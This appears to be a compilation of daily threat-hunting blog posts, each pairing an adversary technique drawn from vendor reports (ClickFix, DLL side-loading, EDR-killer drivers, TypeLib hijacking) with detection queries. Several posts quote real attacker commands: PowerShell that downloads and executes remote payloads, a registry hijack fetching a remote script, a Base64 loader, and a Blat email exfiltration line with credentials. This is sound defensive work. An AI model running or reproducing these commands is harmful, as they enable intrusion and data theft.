Know Your Adversary

Hello everyone! I'm sure you are well-informed about various RMMs abused by adversaries. But have you heard about this one - RustDesk ? For example, it was used ITW by Akira ransomware affiliates. The tool is available for various platforms, here's a Windows version . Let's look at some detection opportunities, and start from the binary itself: event_type: "processcreatewin" AND proc_file_productname: "rustdesk" You may also hunt for file or folder creation events related to RustDesk: event_type: "filecreate" AND file_path: "rustdesk" Make sure you checked non-Windows binaries as well! See you tomorrow!

Hello everyone! It's time to talk about defense evasion tools observed in ransomware attacks again! This time we'll look at Qilin's toolkit. The tool we are going to look at is YDArk . It's a powerful kernel manipulation tool that appeared in the Chinese underground forums back in 2020. Of course, it's used by the adversary to kill AV/EDR related processes. As always, we can the original file name for detection: event_type: "processcreatewin" AND proc_file_originalfilename: "YDArk.exe" Also, you can focus on the driver it uses: event_type: "driverloadwin" AND file_name: "YDArkDrv.sys " It also creates a service - you can also use it as a detection opportunity! See you tomorrow!

Hello everyone! I'm sure you know that various malware performs IP lookups to identify the compromised system's location. Usually the adversaries use legitimate services to solve this problem. What does it mean from threat hunting perspective? We can use it to build our hunting queries! I've collected some of commonly abused services for you, here you go: event_type: "dnsreq" AND dns_rname: ("wtfismyip.com" OR "ipify.org" OR "icanhazip.com" OR "ip-api.com" OR "checkip.dyndns.org" OR "reallyfreegeoip.org") You WILL get some false positives, but we are talkng about hunting, right? See you tomorrow!

Hello everyone! As you know, in most cases espionage-related activity clusters need to collect sensitive data before exfiltration. Of course, they can abuse PowerShell to solve this task! For example, Earth Kurma used the following PowerShell command to collect files of interest: C:\Windows\system32\cmd.exe /C powershell.exe "dir c:\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt' , '*.pptx'| where LastWriteTime -gt (Get-date).AddDays(-30) | foreach {cmd /c copy $_ /y c:\users\{username}\documents\tmp};echo Finish!" I think you've spotted many file extensions. We can use this to build our hunting query: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("pdf" AND "doc" AND "xls" AND "ppt") If you want to share more interesting PowerShell abuse examples, you are always welcome! See you tomor...

Hello everyone! It's time to add a few new items to your (and mine) PowerShell procedure collection! I spotted a few in a recent report on SocGholish activity by eSentire. Let's start from reconnaissance. The adversary leveraged the following PowerShell command to enumerate Active Directory: powershell -c "$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]\'\'); $searcher.Filter = \'(&(objectCategory=computer)(operatingSystem=*server*))\'; $searcher.PageSize = 1000; $searcher.PropertiesToLoad.Add(\'dnshostname\') > $null; $searcher.FindAll() | ForEach-Object { $_.Properties[\'dnshostname\'][0] } We can hunt for similar activity, for example, using the following query: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: "DirectorySearcher" The threat actors also used PowerShell to collect browser-related login data: "cmd.exe" /C powershell -c ...

Hello everyone! Forensic tools help us during incident response engagements, but such tools also may help adversaries to solve various tasks! For example,  ToyMaker abused Magnet RAM Capture to obtain a memory dump of the compromised host, and used it to extract credentials: MRCv120.exe /accepteula /silent /go We can use both metadata and command line parameters for detection: event_type: "processcreatewin" AND proc_file_productname: "Magnet RAM Capture" AND cmdline: ("accepteula" AND "silent" AND "go") See you tomorrow!

Hello everyone! The threat actors keep abusing legitimate binaries for DLL Side Loading. This time the adversaries abused Trend Micro and Bitdefender. According to Symantec report , the Billbug espionage group used a Trend Micro binary named tmdbglog.exe to sideload a malicious DLL named tmdglog.dll , and a Bitdefender binary named bds.exe to sideload a malicious DLL named log.dll . We can hunt for suspicious executions of these binaries focusing on suspicious file names and locations: event_type: "processcreatewin" AND proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe") See you tomorrow!

Hello everyone! We've talked about ClickFix a few times already. But it's quite interesting how various adopt this technique. According to Proofpoint report , multiple state-sponsored adversaries started to use this technique. For example, TA427 (we track this activity cluster under the name Monolithic Werewolf). The threat actor masquaraded malicious PowerShell command to look like a registration code: powershell -windowstyle hidden -Command iwr       "hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile       "$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex       $c;                                                                                    3Z5TY-76FR3-9G87H-7ZC56 As you can see, the command includes...

Hello everyone! Let's talk about not so common persistence techniques. According to ReliaQuest report , Black Basta ransomware affiliates started to use a novel persistence method that involved hijacking the Component Object Model Type Library. In TypeLib hijacking, attackers modify registry entries to redirect legitimate COM objects to malicious scripts or files. The threat actors executed the following command: reg add ""HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64"" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /f For example, we can search for abusing reg.exe : event_type: "processcreatewin" AND proc_file_name: "reg.exe" AND cmdline: ("TypeLib" AND "script") We can also hunt for registry modification events: event_type: "registryvaluesetwin" AND reg_key_path: "TypeLib" AND reg...

Hello everyone! I'm sure everybody heard about  CVE-2025-24054 , which is related to NTLM hash disclosure via spoofing. Check Point presented a report with an overview of how it's been exploited in-the-wild. The exploit is triggered with minimal user interaction, for example, selecting, inspecting, or performing any action other than opening or executing the file. The threat actors use malicious  .library-ms , which are distributed via phishing emails. Files with such extension are not very common, so we can hunt for file creation events: event_type: "filecreate" AND file_path: "library-ms" See you tomorrow!

Hello everyone! Let's look at another tool used by ransomware gangs to disable AV/EDR solutions. I'm talking about  ZammOcide . So, it's another example of abusing a vulnerable driver, this time Zemana Anti-Malware driver (zam64.sys). Of course, we can hunt for related events: event_type: "driverloadwin"  AND file_name: "zam64.sys" It also creates a service named "ZammOcide". We can use it for detection as well: event_type: "serviceinstallwin" AND service_name: "ZammOcide" Of course, the tool is used ITW! For example, by  CrazyHunter ransomware group. See you tomorrow!

Hello everyone! Today we'll talk about another interesting service abused by the threat actors for C&C communications. According to this report by Kaspersky team, IronHusky used the legitimate https://ppng[.]io server powered by the piping-server project to request commands and send back their execution results. What does it mean? We can hunt for communications with this domain: event_type: "dnsreq" AND dns_rname: "ppng.io" The adversary leveraged aforementioned backdoor to download  MysterySnail RAT . See you tomorrow!

Hello everyone! Side-Loading once again! According to Check Point report , APT29 continues to distribute  WINELOADER via phishing emails. These emails contain malicious links to wine.zip . The archive contains  wine.exe - a legitimate PowerPoint executable,  AppvIsvSubsystems64.dll - a required dependency for the PowerPoint executable to run, and  ppcore.dll - a malicious DLL -  GRAPELOADER , which is used to download WINELOADER . I'm sure you've already spotted a low-hanging fruit for detection! Yes, I'm talking about this renamed PowerPoint executable! For example: event_type: "processcreatewin" AND proc_file_originalfilename: "powerpnt.exe" AND NOT proc_file_name: "powerpnt.exe" Of course, you can hunt for other common Microsoft Office related binaries as well! Happy hunting! See you tomorrow!

Hello everyone! I've already mentioned Node.js yesterday, but I spotted another interesting example I want to share with you. Microsoft presented a report on how adversaries misuse Node.js to deliver malware. In described case the threat acors use Node.js runtime (node.exe) to run a malicious JSC file (JavaScript compiled file): node.exe -r .\{filename}.js .\app.jsc The .jsc extension is unusual in everyday Node.js development, so we can use it for our hunting query: event_type: "processcreatewin" AND proc_file_name: "node.exe"  AND  cmdline: "jsc" Have you observed any other interesting cases of Node.js abuse? See you tomorrow!

Hello everyone! Let's look at another activity cluster - Gremlin Wolf (also known as OldGremlin). This is one of my favorite adversaries, and recently I spotted another campaign, so I decided to share some detection and hunting opportunities. The adversary distributes malicious LNK files, for example, this one . It's used to get and open a decoy document from a remote server, as well as to get a NodeJS interpreter to run a malicious JS-script: cmd.exe /c start /B \\documents-drive.com\DavWWWRoot\DIADOC_Akt_sverki-04.25.docx & start /B \\documents-drive.com\DavWWWRoot\node.exe \\documents-drive.com\DavWWWRoot\index.txt To hunt for such activity, I would focus on WebDAV and NodeJS interpreter, so the hunting query may look like this: event_type: "processcreatewin" AND proc_file_name: "cmd.exe" AND cmdline: ("DavWWWRoot" AND "node.exe") See you tomorrow!

Hello everyone! The last one on Paper Werewolf - I promise! This time we'll look at  FlashFileGrabber . This module allows the adversary to collect various files from removable media. If we look inside the script, we can see that there are lots of file extensions. Of course, we can use it for threat hunting! You can find various extensions inside PowerShell scripts adversaries use for sensitive data collection, so you can definitely experiment with a number of them, for example: event_type: "ScriptExecutionWin" AND script_text: ("txt" AND "doc" AND "docx" AND "xls" AND "xlsx" AND "pdf" AND "rar" AND "zip") I hope your threat hunting missions are going well! See you tomorrow!

Hello everyone! Are you ready to keep hunting for Paper Werewolf ? I hope you are! This time let's look at  PowerModul . We keep looking into this report , by the way. PowerModul is a PowerShell script, which enables the adversary to receive and execute additional scripts from the C&C server. It's embedded in the “ UserCache.ini ” file as a Base64-encoded string: $base = "[base64-encoded string]"; $base64 = [System.Convert]::FromBase64String($base); $code = [System.Text.Encoding]::UTF8.GetString($base64); iex $code; To catch such activity, we should look into the Scriptblock. Usually, if you see " FromBase64String " and " iex " together - it's most likely suspicious activity, so it's great candidate for hunting: event_type: "ScriptExecutionWin" AND script_text: ("FromBase64String" AND "iex") If we look at the decoded script, we can also see multiple hunting opportunities. For example, abusing  System.Net.We...

Hello everyone! Let's keep talking about threat hunting! Paper Werewolf is in the news , so let's focus on this activity cluster. And look into this report . The procedure we're going to look at is the following: cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js It's used to drop a JavaScript file named UserCacheHelper.lnk.js onto the disk. The script runs PowerModul . I would suggest to hunt for similar activity focusing on two cmdlets:  Get-Content ...

Hello everyone! In some case you can find a C&C server address under not so common places. For example, Windows registry. If we look through this report on Gamaredon's GammaSteel , we can see that the adversary does just this: IWshShell3.RegWrite("HKEY_CURRENT_USER\Console\WindowsUpdates", "http://172.104.187.254/mood/1/3/2025/confer.html?=[REMOVED]", "REG_SZ"); As you can see, it uses  "HKEY_CURRENT_USER\Console\WindowsUpdates" to store the C&C adress. It means we can search for its modifiction events: event_type: "registryvalueset" AND reg_key_path: "Console\\WindowsUpdates" Of course, this approach won't allow you to detect similar activity for a long time, so you can experiment with variations of key names as well as hunt for adding URLs to various registry keys. See you tomorrow!

Hello everyone!  Sapphire Werewolf has updated Amethyst Stealer and now abuses Canarytokens to collect information about compromised systems. Despite the fact that Canarytokens are used to spot malicious activity, adversaries may use it to be notified about a new victim! The adversary leveraged the following link to collect information about compromised system, including its IP-address and if it's a virtual machine or not: hxxp://canarytokens[.]com/traffic/tags/static/xjemqlqirwqru9pkrh3j4ztmf/payments.js Sure, we can hunt for suspicious domain resolutions: event_type: "dnsreq" AND dns_rname: "canarytokens.com" You can find more information on Sapphire Werewolf's tactics, techniques and procedures in this report . See you tomorrow!

Hello everyone! I think you already heard about a zero-day vulnerability in the Common Log File System (CLFS) weaponized by RansomEXX affiliates. I'm talking about  CVE 2025-29824 . If you look through Microsoft Threat Intelligence Center (MSTIC) report , you can spot a curious artifact. As part of the exploitation, a CLFS BLF file is created: C:\ProgramData\SkyPDF\PDUDrv.blf . What does it mean? We can hunt for similar activity! For example: event_type: "filecreatewin" AND file_path: ("programdata" AND "blf") Despite the fact the adversary exploited a zero day vulnerablity for privilege escalation, the kill chain included some easy detectable behaviors, for example, abusing ProcDump for dumping LSASS. As always - we have lots of detection opportunities even in such cases! See you tomorrow!

Hello everyone! Today I decided to share some information on an interesting exfiltration tool abused by Rare Werewolf . It's called Blat. It's been used by this activity cluster for quite a long time, here's an example : blat.exe -to in@vniir.nl -f "TELEGRAM<sent1@vniir.nl>" -server mail.vniir.nl -port 587 -u sent1@vniir.nl -pw fuFhDK3anVteQCvfVQWk -subject "Telegram 927537/user" -body "Telegram 927537/user" -attach "C:\Users\user\Window\tdata.rar" As you can see, tha adversary uses this tool to exfiltrate collected Telegram messenger data. So, yes, Blat is just a small legitimate utility enabling the threat actors to send collected data via email! We can hunt for such behaviors focusing on credentials and attachments: event_type: "processcreatewin" AND proc_file_originalfilename: "blat.exe" AND cmdline: ("u" AND "pw" AND "attach") By the way, the sample have even more interestin...

Hello everyone! I'm sure everybody already got tired of ClickFix technique, but let me show you another interesting case I spotted recently. It's again about PowerShell abuse. This time adversaries used it to generate the download link: powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 168.119.173[.]205:8080/$u|iex" As you can see, it gets the number of seconds since Unix epoch (Jan 1, 1970), uses it to build a URL, downloads and executes the payload in memory. Of course, we can easily detect such activity, for example, using this logic: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex") Have you seen other interesting scripts in ClickFix campaigns? See you tomorrow!

Hello everyone! Let's talk about Mustang Panda (we track this cluster as Horned Werewolf , as you remember) one more time.  The adversary enjoys DLL Side-Loading, and always finds new vulnerable binaries. For example, this time the cluster used  Canon IJ Printer Assistant Tool . Can we hunt for such activity? Of course! Let's start from running Canon IJ Printer Assistant Tool (cnmpaui.exe) from uncommon locations: event_type: "processcreatewin" AND proc_file_originalfilename: "cnmpaui.exe" AND NOT proc_file_path: "Canon\\Canon IJ Printer Assistant Tool" Another notable behavior is spawning winword.exe from cnmpaui.exe to display a decoy document: event_type: "processcreatewin" AND proc_p_file_path: "cnmpaui.exe" AND proc_file_path: "winword.exe" As always, you can find more if you want! Happy hunting! See you tomorrow!

Hello everyone! I hope you are still not bored digging into ransomware gang's toolkit. This time we'll look at another defense evasion tool - WKTools .  Yes, this is another tool abused by adeversaries to terminate AV/EDR related processes. For example, it's used by Play ransomware gang ITW. Let's start from detecting the tool execution: event_type: "processcreatewin" AND (proc_file_originalfilename: "WKTools.exe" OR proc_file_description: "Windows Kernel Tools" OR proc_file_productname: "WKTools") As you may have guessed, the tool creates a driver: event_type: "filecreatewin" AND file_name: "wktools.sys" And also it deletes the driver: event_type: "filedeletewin" AND file_name: "wktools.sys" As you can see, most of the tools are really noisy, so all you need is to know where to look! See you tomorrow!

Hello everyone! Today I've spotted another technique I don't see used ITW very often. I'm talking about ClickOnce . It's a Microsoft technology that enables the user to install and run a Windows-based smart client application by clicking a link in a web page. I've see this technique in the report on  APT-C-47 . The adversary leveraged phishing to deliver a link to a malicious ClickOnce file (.appref-ms), which starts the kill chain. Of course, you can hunt for execution of such files from suspicious locations, for example, Outlook-related folders: event_type: "processcreatewin" AND cmdline: ("appref-ms" AND "Content.Outlook") If you want to learn more about ClickOnce abuse, here's a great presentation by William Joseph Burke IV. See you tomorrow!

Hello everyone! I've spotted another interesting malicious LNK file, which abuses PowerShell to drop RokRAT , so let's look at detection opportunities you can use both for searching suspicious activity in your network and finding new similar files using external sources like VirusTotal. So, the LNK file execute the following command: powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = '%TEMP%'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf...

Hello everyone! Let's talk about Dead Drop Resolver (DDR) technique one more time. Cyble team presented a report on  FogDoor . The malware retrieves attack commands from a social media profile, communicating with  bark[.]lgbt/api . It means we can hunt for communications with this domain, of course: event_type: "dnsreq" AND dns_rname: "bark.lgbt" It's not all! The adversary also used a temporary webhook storage, webhookbin[.]net , to collect executed command output. We can hunt for similar activity using the same logic: event_type: "dnsreq" AND dns_rname: "webhookbin.net" As always, you can find more detection opportunities in the report. See you tomorrow!

Hello everyone! Today we'll look at another curious example of PowerShell abuse - this time from Head Mare (we track this activity cluster as Rainbow Hyena ). The adversary distributed password protected archives with malicious LNK files. The LNK file executes the following PowerShell command to run  PhantomPyramid backdoor on the compromised system: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "$r=$(Get-Location).Path + '\\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip';if(Test-Path $r) { cmd.exe /c start /B $r; } else { $f=$(Get-ChildItem -Path 'C:\Users\<USER>' -Recurse -Filter '\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip' | Select-Object -First 1); if($f) { $r=$f.FullName; cmd.exe /c start /B $f.FullName; }; };if(-Not (Test-Path $r)) { $r=$(Get-ChildItem -Path 'C:\Users\<USER>\AppData\Local\Temp' -Recurse -Filter "\x417\x430\x44f\x432\x43a\x430_\...